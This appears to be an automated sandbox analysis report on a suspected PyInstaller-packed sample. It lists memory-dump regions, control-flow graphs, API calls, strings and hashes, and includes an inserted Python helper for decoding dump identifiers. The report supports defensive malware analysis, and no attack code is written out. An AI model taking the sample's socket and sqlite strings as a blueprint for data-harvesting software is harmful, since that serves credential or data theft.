• Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
Similarity
• API ID: AddrFreeInfo$getaddrinfo
• String ID: Int or String expected$OOiii$OO|iiii:getaddrinfo$getaddrinfo() argument 1 must be string or None$idna$iiisO$socket.getaddrinfo
• API String ID: 2288433384-1074899869
• Opcode ID: 63f66e3a477a56477b6af0f125f3a74155b83d1ef738e198483645070b047c49
• Instruction ID: f4d18b23a1cf495ca48aa3e76aea62711cd2b7eec8feafc2b4e0fb7559b95203
• Opcode Fuzzy Hash: 63f66e3a477a56477b6af0f125f3a74155b83d1ef738e198483645070b047c49
• Instruction Fuzzy Hash: 14C140B2B29E828AEB58CF31D4445B83BA6FB44BA4F08A635DE4D52764DF3CE554C700

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 04b243870eaa5c32a21b3d253070710121dc7759fdc345f161b4ef5edbe2d9a9
• Instruction ID: 74630ec983ff8b59630089cc6483ce3fa238ccc11d678c6f5ce9123bb77f3583
• Opcode Fuzzy Hash: 04b243870eaa5c32a21b3d253070710121dc7759fdc345f161b4ef5edbe2d9a9
• Instruction Fuzzy Hash: E2418061A08A4285EB10FF25A4005B9E3A2AF44BA4FC44532ED8D67F95DFBCE541C738

Control-flow Graph

control_flow_graph 2276 7ffb0c0a43d0-7ffb0c0a4494 call 7ffb0c0a40d0 2279 7ffb0c0a4846-7ffb0c0a4849 2276->2279 2280 7ffb0c0a449a-7ffb0c0a44b8 2276->2280 2283 7ffb0c0a4853-7ffb0c0a4856 call 7ffb0c026c40 2279->2283 2284 7ffb0c0a484b-7ffb0c0a4851 2279->2284 2281 7ffb0c0a44ba-7ffb0c0a44cd 2280->2281 2282 7ffb0c0a44d2-7ffb0c0a44d6 2280->2282 2285 7ffb0c0a486f-7ffb0c0a488e call 7ffb0c152900 2281->2285 2286 7ffb0c0a44e6-7ffb0c0a44f2 2282->2286 2287 7ffb0c0a44d8-7ffb0c0a44df 2282->2287 2288 7ffb0c0a485b-7ffb0c0a4861 call 7ffb0c081280 2283->2288 2284->2283 2284->2288 2291 7ffb0c0a44f4-7ffb0c0a44f8 2286->2291 2292 7ffb0c0a44fe-7ffb0c0a4502 2286->2292 2287->2286 2290 7ffb0c0a44e1 call 7ffb0c03fef0 2287->2290 2299 7ffb0c0a4866-7ffb0c0a4868 2288->2299 2290->2286 2291->2292 2296 7ffb0c0a457b-7ffb0c0a4586 2291->2296 2297 7ffb0c0a4504-7ffb0c0a4508 2292->2297 2298 7ffb0c0a450a-7ffb0c0a450f call 7ffb0c043790 2292->2298 2303 7ffb0c0a4590-7ffb0c0a45a7 call 7ffb0c04d660 2296->2303 2297->2298 2301 7ffb0c0a4578 2297->2301 2304 7ffb0c0a4514-7ffb0c0a4518 2298->2304 2299->2285 2301->2296 2309 7ffb0c0a45a9-7ffb0c0a45b1 2303->2309 2304->2301 2306 7ffb0c0a451a-7ffb0c0a4527 call 7ffb0c0e2850 2304->2306 2313 7ffb0c0a4529 2306->2313 2314 7ffb0c0a455e-7ffb0c0a4565 2306->2314 2310 7ffb0c0a45b3-7ffb0c0a45bc 2309->2310 2311 7ffb0c0a45be 2309->2311 2315 7ffb0c0a45c1-7ffb0c0a45cf 2310->2315 2311->2315 2316 7ffb0c0a4530-7ffb0c0a4539 2313->2316 2319 7ffb0c0a4567-7ffb0c0a456a call 7ffb0c026400 2314->2319 2320 7ffb0c0a456f-7ffb0c0a4573 2314->2320 2317 7ffb0c0a4685 2315->2317 2318 7ffb0c0a45d5-7ffb0c0a45d8 2315->2318 2316->2316 2321 7ffb0c0a453b-7ffb0c0a454d call 7ffb0c026880 2316->2321 2324 7ffb0c0a468a-7ffb0c0a469d 2317->2324 2322 7ffb0c0a4615-7ffb0c0a461b 2318->2322 2323 7ffb0c0a45da-7ffb0c0a45df 2318->2323 2319->2320 2326 7ffb0c0a4829-7ffb0c0a4831 2320->2326 2321->2314 2346 7ffb0c0a454f-7ffb0c0a4559 00007FFB1C263010 2321->2346 2322->2317 2333 7ffb0c0a461d-7ffb0c0a4630 call 7ffb0c026880 2322->2333 2323->2322 2330 7ffb0c0a45e1-7ffb0c0a45f6 2323->2330 2331 7ffb0c0a46d3-7ffb0c0a46e6 2324->2331 2332 7ffb0c0a469f-7ffb0c0a46a4 2324->2332 2327 7ffb0c0a4833-7ffb0c0a4837 2326->2327 2328 7ffb0c0a483e-7ffb0c0a4844 2326->2328 2327->2328 2334 7ffb0c0a4839 call 7ffb0c03fec0 2327->2334 2328->2279 2328->2299 2336 7ffb0c0a45f8-7ffb0c0a45fb 2330->2336 2337 7ffb0c0a460b-7ffb0c0a4613 call 7ffb0c08a830 2330->2337 2341 7ffb0c0a46e8 2331->2341 2342 7ffb0c0a46ec-7ffb0c0a46f4 2331->2342 2338 7ffb0c0a46b6-7ffb0c0a46bd 2332->2338 2339 7ffb0c0a46a6-7ffb0c0a46ab 2332->2339 2353 7ffb0c0a4666-7ffb0c0a466d 2333->2353 2354 7ffb0c0a4632-7ffb0c0a4663 2333->2354 2334->2328 2336->2337 2347 7ffb0c0a45fd-7ffb0c0a45ff 2336->2347 2337->2324 2351 7ffb0c0a46c0-7ffb0c0a46ce call 7ffb0c042e50 2338->2351 2348 7ffb0c0a46b4 2339->2348 2349 7ffb0c0a46ad-7ffb0c0a46b2 2339->2349 2341->2342 2343 7ffb0c0a46f6-7ffb0c0a4709 call 7ffb0c026880 2342->2343 2344 7ffb0c0a473c-7ffb0c0a473e 2342->2344 2368 7ffb0c0a470b-7ffb0c0a471d 2343->2368 2369 7ffb0c0a4722-7ffb0c0a4729 2343->2369 2357 7ffb0c0a474b-7ffb0c0a47a2 call 7ffb0c029170 call 7ffb0c09cf30 2344->2357 2358 7ffb0c0a4740-7ffb0c0a4744 2344->2358 2346->2314 2347->2337 2356 7ffb0c0a4601-7ffb0c0a4606 2347->2356 2348->2338 2349->2351 2351->2331 2361 7ffb0c0a4677-7ffb0c0a4680 2353->2361 2362 7ffb0c0a466f-7ffb0c0a4672 call 7ffb0c026400 2353->2362 2354->2353 2364 7ffb0c0a481a-7ffb0c0a481e 2356->2364 2376 7ffb0c0a47a7-7ffb0c0a47b9 2357->2376 2358->2357 2365 7ffb0c0a4746 2358->2365 2361->2364 2362->2361 2364->2326 2371 7ffb0c0a4820-7ffb0c0a4824 call 7ffb0c044b80 2364->2371 2365->2357 2368->2369 2373 7ffb0c0a4733-7ffb0c0a4737 2369->2373 2374 7ffb0c0a472b-7ffb0c0a472e call 7ffb0c026400 2369->2374 2371->2326 2373->2364 2374->2373 2378 7ffb0c0a47c6-7ffb0c0a47c8 2376->2378 2379 7ffb0c0a47bb-7ffb0c0a47c1 call 7ffb0c026400 2376->2379 2381 7ffb0c0a47d5-7ffb0c0a47d9 2378->2381 2382 7ffb0c0a47ca-7ffb0c0a47d0 call 7ffb0c07e490 2378->2382 2379->2378 2384 7ffb0c0a47db-7ffb0c0a47f0 call 7ffb0c081310 2381->2384 2385 7ffb0c0a47f2-7ffb0c0a47f4 2381->2385 2382->2381 2384->2364 2387 7ffb0c0a47f6-7ffb0c0a47fe 2385->2387 2388 7ffb0c0a4805-7ffb0c0a4815 2385->2388 2387->2364 2390 7ffb0c0a4800-7ffb0c0a4803 2387->2390 2388->2364 2390->2364 2390->2388
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
• API String ID: 3122504284-879093740
• Opcode ID: e170ef40a4f3ef8d4980dc40dd55d35e8b3872a5a5acbb993ef25cbf03bf03a6
• Instruction ID: 4eba075c3f63e8d490b51206008d678b83bd88f68e9157a9c80bf0509700f7aa
• Opcode Fuzzy Hash: e170ef40a4f3ef8d4980dc40dd55d35e8b3872a5a5acbb993ef25cbf03bf03a6
• Instruction Fuzzy Hash: 1DE1BBE6E0879286EB14CBB5D048ABD27A5FF44B88F055271CE0C177A1EF78E852C344

Control-flow Graph (graph image not reproduced): function at 00007FF7C2661210, basic blocks 7ff7c2661210-7ff7c266146d, first block calls 7ff7c266bdf0
                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                    • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                    • Opcode ID: d1e98af981c38af556f8ae3374d5d3c26190a069fecd9da32f136ef13cde2e87
                                                                                                                                                                                                                                                                    • Instruction ID: 013edc6fe4290a9722309ce62581d231d2c44df3182eafa82d29c95cdecacf6e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1e98af981c38af556f8ae3374d5d3c26190a069fecd9da32f136ef13cde2e87
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F151B622A08A4281EA60BF15A4503B9A2A2FF85BA4FC44135ED8D67FD5DFBCD541C734

Control-flow Graph (graph image not reproduced): function at 00007FFB1BA45190, basic blocks 7ffb1ba45190-7ffb1ba45336, imported call WSAGetLastError
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
• Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$select
                                                                                                                                                                                                                                                                    • String ID: timed out
                                                                                                                                                                                                                                                                    • API String ID: 1043644060-3163636755
                                                                                                                                                                                                                                                                    • Opcode ID: 2fa3c06ebeaf9c0b40a6faa06e916f4905ba1cf81e27fc86f0a827eb6aef7c75
                                                                                                                                                                                                                                                                    • Instruction ID: 236b644816a8106e11562bbe1ef427c5e2574afe9b01e499b263273b0ee788b8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fa3c06ebeaf9c0b40a6faa06e916f4905ba1cf81e27fc86f0a827eb6aef7c75
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD41BEA1E2CE0286FA685B75E4442396292FF45B74F0CE331DE9D42AB4DF3CE8858601
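The Memory Dump Source entries above use identifiers of the form 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp. The following is an added triage helper, not part of the Joe Sandbox report: it splits those identifiers into fields and decodes the fifth and seventh fields with the documented Win32 PAGE_* and MEM_* constants, so an analyst can see at a glance which dumped regions of a module are executable and which are writable code. The field layout (process id, stage, serial, region base, page protection, flags, region type, module index) is an assumption inferred from the entries visible in this report, not from Joe Sandbox documentation; only the base address, protection and region type are decoded. The sample identifiers embedded below are copied from the two dump lists above.

```python
"""Decode Joe Sandbox memory-dump identifiers into region base, page protection
and region type.

Field layout is an ASSUMPTION inferred from the identifiers in this report:
  pid . stage . serial . region_base . page_protection . flags . region_type . module_index . sdmp
Protection and type values are decoded with the Win32 constants that appear in
MEMORY_BASIC_INFORMATION (PAGE_* and MEM_*).
"""
import re
from dataclasses import dataclass

PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Modifier bits that may be OR-ed onto the base protection value.
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
REGION_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_ID_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\."
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    pid: int            # assumed: first field matches the process number in the report
    base: int           # region base address (fourth field)
    protect: int        # page protection (fifth field, assumed)
    region_type: int    # MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE (seventh field, assumed)
    module_index: int   # assumed: groups regions belonging to one loaded image

    @property
    def protection_name(self) -> str:
        base = self.protect & 0xFF
        names = [PAGE_PROTECTIONS.get(base, f"UNKNOWN(0x{base:x})")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def type_name(self) -> str:
        return REGION_TYPES.get(self.region_type, f"UNKNOWN(0x{self.region_type:x})")

    @property
    def executable(self) -> bool:
        # All PAGE_EXECUTE* values live in the 0xF0 nibble.
        return bool(self.protect & 0xF0)

    @property
    def writable_and_executable(self) -> bool:
        # RWX or execute-writecopy pages: code that could have been patched in place.
        return (self.protect & 0xFF) in (0x40, 0x80)


def parse_dump_id(name: str) -> DumpRegion:
    """Parse one identifier; raise ValueError if it does not match the expected shape."""
    m = _ID_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name!r}")
    pid, _stage, _serial, base, protect, _flags, rtype, module = m.groups()
    return DumpRegion(int(pid, 16), int(base, 16), int(protect, 16), int(rtype, 16), int(module, 16))


def group_by_module(names) -> dict:
    """Group regions by (pid, module_index) and sort each group by base address."""
    out = {}
    for n in names:
        r = parse_dump_id(n)
        out.setdefault((r.pid, r.module_index), []).append(r)
    for regions in out.values():
        regions.sort(key=lambda r: r.base)
    return out


# Identifiers copied from the Memory Dump Source lists in this report.
REPORT_DUMPS = [
    "00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp",
    "00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp",
    "00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp",
    "00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp",
    "00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmp",
]

if __name__ == "__main__":
    for (pid, mod), regions in sorted(group_by_module(REPORT_DUMPS).items()):
        print(f"pid {pid} module {mod:#x}")
        for r in regions:
            flag = "  <-- writable code" if r.writable_and_executable else ""
            print(f"  {r.base:#018x} {r.protection_name:<24} {r.type_name}{flag}")
```

Run it on the identifiers from a report to list each image's regions in address order; regions flagged as writable code (0x40 or 0x80) are the ones to diff against the on-disk section before trusting the disassembly shown in the report.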

Control-flow Graph (graph image not reproduced)

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF7C2663804), ref: 00007FF7C26636E1
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00007FF7C2663804), ref: 00007FF7C26636EB
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662C9E
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7C2663706,?,00007FF7C2663804), ref: 00007FF7C2662D63
                                                                                                                                                                                                                                                                      • Part of subcall function 00007FF7C2662C50: MessageBoxW.USER32 ref: 00007FF7C2662D99
                                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                    • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                                    • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                    • Instruction ID: 4133b74280d9d2b8651899db4c27cb38a9961711c748b40e9f9c750c72edb290
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70217461B1864281FA20BF20E8543B59262BF94768FC00136D9DDA3FD5EEBCE515C338
                                                                                                                                                                                                                                                                    APIs
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
APIs
• 00007FFB1C263010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFB0C09D0A0), ref: 00007FFB0C0590FD
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007C263010
• String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
• API String ID: 3122504284-3538577999
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFB1BA40000, based on PE: true
• Associated: 00000007.00000002.1715163702.00007FFB1BA40000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA51000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA53000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715198195.00007FFB1BA56000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715358150.00007FFB1BA57000.00000080.00000001.01000000.0000000D.sdmp
• Associated: 00000007.00000002.1715396794.00007FFB1BA58000.00000004.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1ba40000_X9g8L63QGs.jbxd
Similarity
• API ID: setsockopt
• String ID: iiO!I:setsockopt$iii:setsockopt$iiy*:setsockopt$socket option is larger than %i bytes
• API String ID: 3981526788-1608436615
Strings
Memory Dump Source
• Source File: 00000007.00000002.1710456496.00007FF7C2661000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C2660000, based on PE: true
• Associated: 00000007.00000002.1710418223.00007FF7C2660000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710502277.00007FF7C268B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C269E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710544783.00007FF7C26A1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000007.00000002.1710622802.00007FF7C26A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7c2660000_X9g8L63QGs.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
• Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
Similarity
• API ID: CreateFile
• String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
• API String ID: 823142352-3829269058
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFB0C1A0000, based on PE: true
• Associated: 00000007.00000002.1713216867.00007FFB0C1A0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1B9000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713252916.00007FFB0C1BF000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713365488.00007FFB0C1C1000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.1713399942.00007FFB0C1C3000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb0c1a0000_X9g8L63QGs.jbxd
Similarity
• API ID: 00007F805
• String ID: BEGIN$sqlite3.connect$sqlite3.connect/handle
• API String ID: 4011786353-2348745481
                                                                                                                                                                                                                                                                    • Opcode ID: 9d4ea5e82f375ba1b03b948d9975b46a180430bb194de34b564c94f02b4a9628
                                                                                                                                                                                                                                                                    • Instruction ID: 76a0b9723a6547e330aa9eff771c2d4f8c0216d845693f20a54e460425e2aaa9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d4ea5e82f375ba1b03b948d9975b46a180430bb194de34b564c94f02b4a9628
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDB137F6A09B42C6EB608F75E948A6933A4FF49B94F084175DA8E43B64DF3CE456C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFB0C020000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712866038.00007FFB0C020000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C181000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C183000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
